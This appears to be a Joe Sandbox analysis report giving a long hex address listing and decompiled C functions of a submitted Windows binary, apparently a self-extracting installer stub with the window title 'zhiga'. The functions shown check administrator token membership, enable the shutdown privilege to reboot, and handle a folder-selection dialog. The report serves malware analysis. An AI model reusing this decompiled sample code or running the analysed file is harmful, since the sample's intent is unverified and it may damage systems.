                                                                        0x00a36230
                                                                        0x00a36247
                                                                        0x00a3626a
                                                                        0x00a36272
                                                                        0x00a36249
                                                                        0x00a36255
                                                                        0x00a3625f
                                                                        0x00a36264
                                                                        0x00a36264
                                                                        0x00a36284
                                                                        0x00a35dc0
                                                                        0x00a35dc0
                                                                        0x00a35dca
                                                                        0x00a35e22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35dcc
                                                                        0x00a35dce
                                                                        0x00a35e24
                                                                        0x00a35e24
                                                                        0x00a35e2c
                                                                        0x00a35e47
                                                                        0x00a35e4a
                                                                        0x00a361d2
                                                                        0x00a361e2
                                                                        0x00a361e7
                                                                        0x00a361ee
                                                                        0x00a361f1
                                                                        0x00a361f1
                                                                        0x00a361f8
                                                                        0x00a361f8
                                                                        0x00a35e50
                                                                        0x00a35e53
                                                                        0x00a36109
                                                                        0x00a3611f
                                                                        0x00000000
                                                                        0x00a36125
                                                                        0x00a36137
                                                                        0x00a3613a
                                                                        0x00a3613c
                                                                        0x00a3613e
                                                                        0x00a3613e
                                                                        0x00a36141
                                                                        0x00a36141
                                                                        0x00a36143
                                                                        0x00a36144
                                                                        0x00a3614a
                                                                        0x00000000
                                                                        0x00a36150
                                                                        0x00a36152
                                                                        0x00a3615c
                                                                        0x00a36170
                                                                        0x00a36172
                                                                        0x00a3617c
                                                                        0x00a36190
                                                                        0x00a36190
                                                                        0x00a36196
                                                                        0x00a361a5
                                                                        0x00000000
                                                                        0x00a361ab
                                                                        0x00a361b9
                                                                        0x00a361c6
                                                                        0x00a361c6
                                                                        0x00a3617e
                                                                        0x00a36180
                                                                        0x00a3618a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3618a
                                                                        0x00a3615e
                                                                        0x00a36160
                                                                        0x00a3616a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3616a
                                                                        0x00a3615c
                                                                        0x00a3614a
                                                                        0x00a3610b
                                                                        0x00a3610e
                                                                        0x00a3610e
                                                                        0x00000000
                                                                        0x00a35e59
                                                                        0x00a35e59
                                                                        0x00a35e5c
                                                                        0x00a3604f
                                                                        0x00a36056
                                                                        0x00000000
                                                                        0x00a3605c
                                                                        0x00a3606e
                                                                        0x00a36071
                                                                        0x00a36073
                                                                        0x00a36075
                                                                        0x00a36075
                                                                        0x00a36078
                                                                        0x00a36078
                                                                        0x00a3607a
                                                                        0x00a3607b
                                                                        0x00a36081
                                                                        0x00000000
                                                                        0x00a36087
                                                                        0x00a36087
                                                                        0x00a3608d
                                                                        0x00a3609c
                                                                        0x00000000
                                                                        0x00a360a2
                                                                        0x00a360aa
                                                                        0x00a360b2
                                                                        0x00a360b7
                                                                        0x00a360bd
                                                                        0x00a360bf
                                                                        0x00a360bf
                                                                        0x00a360d6
                                                                        0x00a360e0
                                                                        0x00a360e7
                                                                        0x00a360f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a360f5
                                                                        0x00a3609c
                                                                        0x00a36081
                                                                        0x00a35e62
                                                                        0x00a35e62
                                                                        0x00a35e65
                                                                        0x00a35fd3
                                                                        0x00a35fe9
                                                                        0x00000000
                                                                        0x00a35fef
                                                                        0x00a35fef
                                                                        0x00a35ff7
                                                                        0x00a35ffd
                                                                        0x00a36003
                                                                        0x00a36006
                                                                        0x00a36011
                                                                        0x00a36014
                                                                        0x00a3603d
                                                                        0x00a36016
                                                                        0x00a36018
                                                                        0x00a36019
                                                                        0x00a3601b
                                                                        0x00a36033
                                                                        0x00a3601d
                                                                        0x00a36020
                                                                        0x00a36029
                                                                        0x00a36022
                                                                        0x00a36022
                                                                        0x00a36022
                                                                        0x00a36020
                                                                        0x00a3601b
                                                                        0x00a36042
                                                                        0x00a36044
                                                                        0x00a36046
                                                                        0x00a3604a
                                                                        0x00a35ff7
                                                                        0x00a35fd5
                                                                        0x00a35fd8
                                                                        0x00a35fd8
                                                                        0x00000000
                                                                        0x00a35e6b
                                                                        0x00a35e6b
                                                                        0x00a35e6e
                                                                        0x00a35f8b
                                                                        0x00a35f99
                                                                        0x00000000
                                                                        0x00a35f9f
                                                                        0x00a35fa7
                                                                        0x00a35faf
                                                                        0x00000000
                                                                        0x00a35fb1
                                                                        0x00a35fb3
                                                                        0x00000000
                                                                        0x00a35fb5
                                                                        0x00a35fb7
                                                                        0x00000000
                                                                        0x00a35fb9
                                                                        0x00000000
                                                                        0x00a35fb9
                                                                        0x00a35fb7
                                                                        0x00a35fb3
                                                                        0x00a35faf
                                                                        0x00a35f8d
                                                                        0x00a35f8d
                                                                        0x00a35f8d
                                                                        0x00a35f8f
                                                                        0x00a35fc1
                                                                        0x00a35fc1
                                                                        0x00a35fc1
                                                                        0x00000000
                                                                        0x00a35e74
                                                                        0x00a35e74
                                                                        0x00a35e77
                                                                        0x00a35ea0
                                                                        0x00a35ebd
                                                                        0x00a35f79
                                                                        0x00000000
                                                                        0x00a35f7f
                                                                        0x00a35ec3
                                                                        0x00a35ec3
                                                                        0x00a35ecc
                                                                        0x00a35ed4
                                                                        0x00a35ed6
                                                                        0x00a35edc
                                                                        0x00a35edf
                                                                        0x00a35eea
                                                                        0x00a35eed
                                                                        0x00a35f3f
                                                                        0x00a35f40
                                                                        0x00000000
                                                                        0x00a35eef
                                                                        0x00a35eef
                                                                        0x00a35ef2
                                                                        0x00a35f34
                                                                        0x00a35ef4
                                                                        0x00a35ef4
                                                                        0x00a35ef7
                                                                        0x00a35f2b
                                                                        0x00000000
                                                                        0x00a35ef9
                                                                        0x00a35ef9
                                                                        0x00a35efc
                                                                        0x00a35f22
                                                                        0x00000000
                                                                        0x00a35efe
                                                                        0x00a35eff
                                                                        0x00a35f02
                                                                        0x00a35f16
                                                                        0x00a35f04
                                                                        0x00a35f07
                                                                        0x00a35f0d
                                                                        0x00a35f46
                                                                        0x00a35f46
                                                                        0x00a35f09
                                                                        0x00a35f09
                                                                        0x00a35f09
                                                                        0x00a35f07
                                                                        0x00a35f02
                                                                        0x00a35efc
                                                                        0x00a35ef7
                                                                        0x00a35ef2
                                                                        0x00a35f4c
                                                                        0x00a35f4e
                                                                        0x00a35f50
                                                                        0x00a35f54
                                                                        0x00a35ed4
                                                                        0x00a35ea2
                                                                        0x00a35ea4
                                                                        0x00a35eaf
                                                                        0x00a35eaf
                                                                        0x00000000
                                                                        0x00a35e79
                                                                        0x00a35e7d
                                                                        0x00000000
                                                                        0x00a35e83
                                                                        0x00a35e83
                                                                        0x00a35e83
                                                                        0x00a35e85
                                                                        0x00a35e85
                                                                        0x00a35e8e
                                                                        0x00000000
                                                                        0x00a35e94
                                                                        0x00000000
                                                                        0x00a35e94
                                                                        0x00a35e8e
                                                                        0x00a35e7d
                                                                        0x00a35e77
                                                                        0x00a35e6e
                                                                        0x00a35e65
                                                                        0x00a35e5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35dd0
                                                                        0x00a35dd0
                                                                        0x00a35dd0
                                                                        0x00000000
                                                                        0x00a35dd0
                                                                        0x00a35dce
                                                                        0x00a35dca
                                                                        0x00a35dba
                                                                        0x00000000
                                                                        0x00a35d00
                                                                        0x00a35dd9
                                                                        0x00a35e04
                                                                        0x00a361fe
                                                                        0x00a35e0a
                                                                        0x00a35e0c
                                                                        0x00a35e17
                                                                        0x00a35e17
                                                                        0x00a35e04
                                                                        0x00a36200
                                                                        0x00a36200
                                                                        0x00000000

                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00A35CEE
                                                                        • GetModuleFileNameA.KERNEL32(00A38B3E,00000104,00000000,?,?), ref: 00A35DFC
                                                                        • CharUpperA.USER32(?), ref: 00A35E3E
                                                                        • CharUpperA.USER32(-00000052), ref: 00A35EE1
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A35F6F
                                                                        • CharUpperA.USER32(?), ref: 00A35FA7
                                                                        • CharUpperA.USER32(-0000004E), ref: 00A36008
                                                                        • CharUpperA.USER32(?), ref: 00A360AA
                                                                        • CloseHandle.KERNEL32(00000000,00A31140,00000000,00000040,00000000), ref: 00A361F1
                                                                        • ExitProcess.KERNEL32 ref: 00A361F8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                        • String ID: "$"$:$RegServer
                                                                        • API String ID: 1203814774-25366791
                                                                        • Opcode ID: 498f963dba783da8b96269a1771e93afe38932f5814089f884182febcb72683d
                                                                        • Instruction ID: 983a309d904afcb6f26e9449b5ccf04c1f08ea913405734821a6b316832ef085
                                                                        • Opcode Fuzzy Hash: 498f963dba783da8b96269a1771e93afe38932f5814089f884182febcb72683d
                                                                        • Instruction Fuzzy Hash: D3D14A71E04B546ADF39CB7C9C497FA77B1AB16344F2481AAF4D6C6190DAB48E838F40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E00A318A3(void* __edx, void* __esi) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				char _v20;
                                                                        				long _v24;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t23;
                                                                        				long _t45;
                                                                        				void* _t49;
                                                                        				int _t50;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        
                                                                        				_t51 = __esi;
                                                                        				_t49 = __edx;
                                                                        				_t23 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t23 ^ _t53;
                                                                        				_t25 =  *0xa38128; // 0x2
                                                                        				_t45 = 0;
                                                                        				_v12 = 0x500;
                                                                        				_t50 = 2;
                                                                        				_v16.Value = 0;
                                                                        				_v20 = 0;
                                                                        				if(_t25 != _t50) {
                                                                        					L20:
                                                                        					return E00A36CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                        				}
                                                                        				if(E00A317EE( &_v20) != 0) {
                                                                        					_t25 = _v20;
                                                                        					if(_v20 != 0) {
                                                                        						 *0xa38128 = 1;
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                        					L17:
                                                                        					CloseHandle(_v28);
                                                                        					_t25 = _v20;
                                                                        					goto L20;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                        					if(_t52 == 0) {
                                                                        						L16:
                                                                        						_pop(_t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                        						L15:
                                                                        						LocalFree(_t52);
                                                                        						goto L16;
                                                                        					} else {
                                                                        						if( *_t52 <= 0) {
                                                                        							L14:
                                                                        							FreeSid(_v32);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t15 = _t52 + 4; // 0x4
                                                                        						_t50 = _t15;
                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                        							_t45 = _t45 + 1;
                                                                        							_t50 = _t50 + 8;
                                                                        							if(_t45 <  *_t52) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        						 *0xa38128 = 1;
                                                                        						_v20 = 1;
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 00A317EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A318DD), ref: 00A3181A
                                                                          • Part of subcall function 00A317EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A3182C
                                                                          • Part of subcall function 00A317EE: AllocateAndInitializeSid.ADVAPI32(00A318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A318DD), ref: 00A31855
                                                                          • Part of subcall function 00A317EE: FreeSid.ADVAPI32(?,?,?,?,00A318DD), ref: 00A31883
                                                                          • Part of subcall function 00A317EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A318DD), ref: 00A3188A
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A318EB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A318F2
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A3190A
                                                                        • GetLastError.KERNEL32 ref: 00A31918
                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A3192C
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A31944
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A31964
                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00A3197A
                                                                        • FreeSid.ADVAPI32(?), ref: 00A3199C
                                                                        • LocalFree.KERNEL32(00000000), ref: 00A319A3
                                                                        • CloseHandle.KERNEL32(?), ref: 00A319AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                        • String ID:
                                                                        • API String ID: 2168512254-0
                                                                        • Opcode ID: 8e890dc0cb21ff2210e12fb27c699cab2bddba4e27f5c24f4c579c839dbd32aa
                                                                        • Instruction ID: 44fbf0d1da3d927f3498cb9c3d6220cedb9a037888ac98d0d90c0a6f94ef2d0f
                                                                        • Opcode Fuzzy Hash: 8e890dc0cb21ff2210e12fb27c699cab2bddba4e27f5c24f4c579c839dbd32aa
                                                                        • Instruction Fuzzy Hash: C0310A71A00219AFDB20DFE5EC98AAFBBBCFF19700F104429F585D2160DB359916CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E00A31F90(signed int __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				signed int _t13;
                                                                        				int _t21;
                                                                        				void* _t25;
                                                                        				int _t28;
                                                                        				signed char _t30;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				signed int _t46;
                                                                        
                                                                        				_t41 = __esi;
                                                                        				_t38 = __edi;
                                                                        				_t30 = __ecx;
                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                        					L12:
                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                        						L14:
                                                                        						if( *0xa39a40 != 0) {
                                                                        							_pop(_t30);
                                                                        							_t44 = _t46;
                                                                        							_t13 =  *0xa38004; // 0xb6b6972c
                                                                        							_v8 = _t13 ^ _t46;
                                                                        							_push(_t38);
                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                        								_v24.PrivilegeCount = 1;
                                                                        								_v12 = 2;
                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                        								CloseHandle(_v28);
                                                                        								_t41 = _t41;
                                                                        								_push(0);
                                                                        								if(_t21 != 0) {
                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                        										_t25 = 1;
                                                                        									} else {
                                                                        										_t37 = 0x4f7;
                                                                        										goto L3;
                                                                        									}
                                                                        								} else {
                                                                        									_t37 = 0x4f6;
                                                                        									goto L4;
                                                                        								}
                                                                        							} else {
                                                                        								_t37 = 0x4f5;
                                                                        								L3:
                                                                        								_push(0);
                                                                        								L4:
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								E00A344B9(0, _t37);
                                                                        								_t25 = 0;
                                                                        							}
                                                                        							_pop(_t40);
                                                                        							return E00A36CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                        						} else {
                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                        							goto L16;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = 0x522;
                                                                        						_t28 = E00A344B9(0, 0x522, 0xa31140, 0, 0x40, 4);
                                                                        						if(_t28 != 6) {
                                                                        							goto L16;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					__eax = E00A31EA7(__ecx);
                                                                        					if(__eax != 2) {
                                                                        						L16:
                                                                        						return _t28;
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A31EFB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A31F02
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00A31FD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2795981589-3733053543
                                                                        • Opcode ID: a3c87f098cfb7bc1e9693faff2331aa0e21ae48dc5f8399331280fec17d8ca71
                                                                        • Instruction ID: a574c51e60c09b3ea28157287257cc3adad2d352a6918105b85a1aabb6972824
                                                                        • Opcode Fuzzy Hash: a3c87f098cfb7bc1e9693faff2331aa0e21ae48dc5f8399331280fec17d8ca71
                                                                        • Instruction Fuzzy Hash: 2B21D6B1B403057BDB209BE19C4AFBF7BBCEB95B50F20052EFA02E6181D7758802D661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A37155() {
                                                                        				void* _v8;
                                                                        				struct _FILETIME _v16;
                                                                        				signed int _v20;
                                                                        				union _LARGE_INTEGER _v24;
                                                                        				signed int _t23;
                                                                        				signed int _t36;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        
                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                        				_t23 =  *0xa38004; // 0xb6b6972c
                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                        					QueryPerformanceCounter( &_v24);
                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                        					_t39 = _t36;
                                                                        					if(_t36 == 0xbb40e64e || ( *0xa38004 & 0xffff0000) == 0) {
                                                                        						_t36 = 0xbb40e64f;
                                                                        						_t39 = 0xbb40e64f;
                                                                        					}
                                                                        					 *0xa38004 = _t39;
                                                                        				}
                                                                        				_t37 =  !_t36;
                                                                        				 *0xa38008 = _t37;
                                                                        				return _t37;
                                                                        			}












                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A37182
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00A37191
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00A3719A
                                                                        • GetTickCount.KERNEL32 ref: 00A371A3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00A371B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: 35943aed9e131b00f268ca48aebc50ed9eb5e8f48b3bb2d48d18196ad6252990
                                                                        • Instruction ID: 6bf526da91e02dab95e65eb8eed9ce55dfa8935561e3852b9ebc74cded3d261f
                                                                        • Opcode Fuzzy Hash: 35943aed9e131b00f268ca48aebc50ed9eb5e8f48b3bb2d48d18196ad6252990
                                                                        • Instruction Fuzzy Hash: 0C113AB1D01218DBCB14DFF8DE48A9EB7F4EF18310F614A55F806E7220EA349A058B41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A36CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                        
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				UnhandledExceptionFilter(_a4);
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}




                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A36E26,00A31000), ref: 00A36CF7
                                                                        • UnhandledExceptionFilter.KERNEL32(00A36E26,?,00A36E26,00A31000), ref: 00A36D00
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00A36E26,00A31000), ref: 00A36D0B
                                                                        • TerminateProcess.KERNEL32(00000000,?,00A36E26,00A31000), ref: 00A36D12
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID:
                                                                        • API String ID: 3231755760-0
                                                                        • Opcode ID: 2d51a813522bdd92ad579657c636fc1a516bfe90140abca04784b5d18987ae12
                                                                        • Instruction ID: 8f508ff5e7b64412803d0abbd6e23c7116d503ae340bed5e8afb57740c1a4acb
                                                                        • Opcode Fuzzy Hash: 2d51a813522bdd92ad579657c636fc1a516bfe90140abca04784b5d18987ae12
                                                                        • Instruction Fuzzy Hash: 56D0C932000218BBDB006BE1EC0CA593F28EB58212F444104F35982020CA7244528B52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00A33210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* _t6;
                                                                        				void* _t10;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				int _t23;
                                                                        				char _t24;
                                                                        				long _t25;
                                                                        				int _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				int _t38;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        				void* _t46;
                                                                        				CHAR* _t49;
                                                                        				void* _t58;
                                                                        				void* _t63;
                                                                        				struct HWND__* _t64;
                                                                        
                                                                        				_t64 = _a4;
                                                                        				_t6 = _a8 - 0x10;
                                                                        				if(_t6 == 0) {
                                                                        					_push(0);
                                                                        					L38:
                                                                        					EndDialog(_t64, ??);
                                                                        					L39:
                                                                        					__eflags = 1;
                                                                        					return 1;
                                                                        				}
                                                                        				_t42 = 1;
                                                                        				_t10 = _t6 - 0x100;
                                                                        				if(_t10 == 0) {
                                                                        					E00A343D0(_t64, GetDesktopWindow());
                                                                        					SetWindowTextA(_t64, "zhiga");
                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                        					__eflags =  *0xa39a40 - _t42; // 0x3
                                                                        					if(__eflags == 0) {
                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                        					}
                                                                        					L36:
                                                                        					return _t42;
                                                                        				}
                                                                        				if(_t10 == _t42) {
                                                                        					_t20 = _a12 - 1;
                                                                        					__eflags = _t20;
                                                                        					if(_t20 == 0) {
                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa391e4, 0x104);
                                                                        						__eflags = _t21;
                                                                        						if(_t21 == 0) {
                                                                        							L32:
                                                                        							_t58 = 0x4bf;
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							L25:
                                                                        							E00A344B9(_t64, _t58);
                                                                        							goto L39;
                                                                        						}
                                                                        						_t49 = 0xa391e4;
                                                                        						do {
                                                                        							_t23 =  *_t49;
                                                                        							_t49 =  &(_t49[1]);
                                                                        							__eflags = _t23;
                                                                        						} while (_t23 != 0);
                                                                        						__eflags = _t49 - 0xa391e5 - 3;
                                                                        						if(_t49 - 0xa391e5 < 3) {
                                                                        							goto L32;
                                                                        						}
                                                                        						_t24 =  *0xa391e5; // 0x3a
                                                                        						__eflags = _t24 - 0x3a;
                                                                        						if(_t24 == 0x3a) {
                                                                        							L21:
                                                                        							_t25 = GetFileAttributesA(0xa391e4);
                                                                        							__eflags = _t25 - 0xffffffff;
                                                                        							if(_t25 != 0xffffffff) {
                                                                        								L26:
                                                                        								E00A3658A(0xa391e4, 0x104, 0xa31140);
                                                                        								_t27 = E00A358C8(0xa391e4);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 != 0) {
                                                                        									__eflags =  *0xa391e4 - 0x5c;
                                                                        									if( *0xa391e4 != 0x5c) {
                                                                        										L30:
                                                                        										_t30 = E00A3597D(0xa391e4, 1, _t64, 1);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											L35:
                                                                        											_t42 = 1;
                                                                        											__eflags = 1;
                                                                        											goto L36;
                                                                        										}
                                                                        										L31:
                                                                        										_t42 = 1;
                                                                        										EndDialog(_t64, 1);
                                                                        										goto L36;
                                                                        									}
                                                                        									__eflags =  *0xa391e5 - 0x5c;
                                                                        									if( *0xa391e5 == 0x5c) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                                        								}
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t58 = 0x4be;
                                                                        								goto L25;
                                                                        							}
                                                                        							_t32 = E00A344B9(_t64, 0x54a, 0xa391e4, 0, 0x20, 4);
                                                                        							__eflags = _t32 - 6;
                                                                        							if(_t32 != 6) {
                                                                        								goto L35;
                                                                        							}
                                                                        							_t33 = CreateDirectoryA(0xa391e4, 0);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
